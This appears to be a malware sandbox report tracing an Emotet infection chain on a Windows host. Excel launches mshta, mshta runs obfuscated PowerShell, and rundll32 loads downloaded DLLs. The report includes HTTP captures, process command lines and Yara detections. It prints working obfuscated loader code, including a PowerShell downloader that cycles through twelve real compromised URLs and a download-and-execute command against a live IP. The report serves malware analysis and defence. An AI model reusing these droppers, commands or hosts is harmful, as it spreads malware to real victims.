                                     Jan 28, 2022 21:18:21.949342966 CET | 2 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.20.2
                                    Date: Fri, 28 Jan 2022 20:18:21 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Ascii: 2b2e<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'}\\162%20}61y%37}$D}}&2}&3B} 1}71}$8}\'}23%74}}56%6}*Ef} 2}>7mCh}A1r%43}H}44e}}53}33}92C}$}[0}9}$B}E157}O2}56}d3}(3}b}-i}$}_


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    1 | 192.168.2.22 | 49168 | 91.240.118.172 | 80 | C:\Windows\System32\mshta.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jan 28, 2022 21:18:27.714525938 CET | 13 | OUT | GET /gg/ff/fe.png HTTP/1.1
                                    Host: 91.240.118.172
                                    Connection: Keep-Alive
                                    Jan 28, 2022 21:18:27.776531935 CET | 14 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.20.2
                                    Date: Fri, 28 Jan 2022 20:18:27 GMT
                                    Content-Type: image/png
                                    Content-Length: 1199
                                    Connection: keep-alive
                                    Last-Modified: Fri, 28 Jan 2022 14:54:48 GMT
                                    ETag: "4af-5d6a59dbe5e00"
                                    Accept-Ranges: bytes
                                    Data Ascii: $path = "C{seeda}:\Pr{seeda}ogramD{seeda}ata\{seeda}JooSee.d{seeda}ll".replace('{seeda}','');$url1 = 'http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/';$url2 = 'http://jurnalpjf.lan.go.id/assets/iM/';$url3 = 'http://it-o.biz/bitrix/xoDdDe/';$url4 = 'http://bimesarayenovin.ir/wp-admin/G1pYGL/';$url5 = 'http://gardeningfilm.com/wp-content/pcMVUYDQ3q/';$url6 = 'http://daisy.sukoburu-secure.com/8plks/v8lyZTe/';$url7 = 'https://property-eg.com/mlzkir/97v/';$url8 = 'http://totalplaytuxtla.com/sitio/DgktL3zd/';$url9 = 'http://maxtdeveloper.com/okw9yx/Gc28ZX/';$url10 = 'http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/';$url11 = 'http://activetraining.sytes.net/libraries/8s/';$url12 = 'https://gudangtasorichina.com/wp-content/GG01c/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } }


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    2 | 192.168.2.22 | 49170 | 103.206.244.105 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jan 28, 2022 21:18:49.391053915 CET | 15 | OUT | GET /assets/iM/ HTTP/1.1
                                    Host: jurnalpjf.lan.go.id
                                    Connection: Keep-Alive
                                    Jan 28, 2022 21:18:49.579858065 CET | 17 | IN | HTTP/1.1 200 OK
                                    Date: Fri, 28 Jan 2022 20:18:49 GMT
                                    Server: Apache/2.4.6 (CentOS) PHP/7.4.27
                                    X-Powered-By: PHP/7.4.27
                                    Set-Cookie: 61f44fa975c8c=1643401129; expires=Fri, 28-Jan-2022 20:19:49 GMT; Max-Age=60; path=/
                                    Cache-Control: no-cache, must-revalidate
                                    Pragma: no-cache
                                    Last-Modified: Fri, 28 Jan 2022 20:18:49 GMT
                                    Expires: Fri, 28 Jan 2022 20:18:49 GMT
                                    Content-Disposition: attachment; filename="KfCx9N.dll"
                                    Content-Transfer-Encoding: binary
                                    Content-Length: 548864
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/x-msdownload
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B



                                    Target ID:0
                                    Start time:21:18:18
                                    Start date:28/01/2022
                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x13f7b0000
                                    File size:28253536 bytes
                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:2
                                    Start time:21:18:20
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                                    Imagebase:0x4aa90000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:4
                                    Start time:21:18:21
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\mshta.exe
                                    Wow64 process (32bit):false
                                    Commandline:mshta http://91.240.118.172/gg/ff/fe.html
                                    Imagebase:0x13fa50000
                                    File size:13824 bytes
                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:6
                                    Start time:21:18:24
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                    Imagebase:0x13ff60000
                                    File size:473600 bytes
                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:high

                                    Target ID:8
                                    Start time:21:18:59
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                    Imagebase:0x4a6d0000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:9
                                    Start time:21:18:59
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                                    Imagebase:0x4e0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:10
                                    Start time:21:19:03
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                                    Imagebase:0x4e0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:12
                                    Start time:21:19:26
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
                                    Imagebase:0x4e0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:13
                                    Start time:21:19:31
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
                                    Imagebase:0x4e0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    Target ID:14
                                    Start time:21:19:53
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
                                    Imagebase:0x4e0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

Target ID: 15
Start time: 21:19:58
Start date: 28/01/2022
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
Imagebase: 0x4e0000
File size: 44544 bytes
MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

No disassembly
